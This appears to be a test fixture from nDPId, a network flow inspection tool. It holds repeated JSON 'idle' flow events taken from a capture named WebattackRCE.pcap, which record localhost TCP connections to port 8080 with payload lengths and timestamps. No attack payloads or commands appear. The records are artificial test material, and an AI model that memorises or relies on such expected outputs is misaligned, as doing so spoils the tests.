-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276926,"flow_last_seen":1576420276926,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276928,"flow_last_seen":1576420276928,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276929,"flow_last_seen":1576420276929,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276932,"flow_last_seen":1576420276932,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7440000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276950,"flow_last_seen":1576420276950,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276953,"flow_last_seen":1576420276953,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276955,"flow_last_seen":1576420276955,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276956,"flow_last_seen":1576420276956,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276957,"flow_last_seen":1576420276957,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276959,"flow_last_seen":1576420276959,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276960,"flow_last_seen":1576420276960,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276961,"flow_last_seen":1576420276961,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276964,"flow_last_seen":1576420276964,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276965,"flow_last_seen":1576420276965,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276966,"flow_last_seen":1576420276966,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 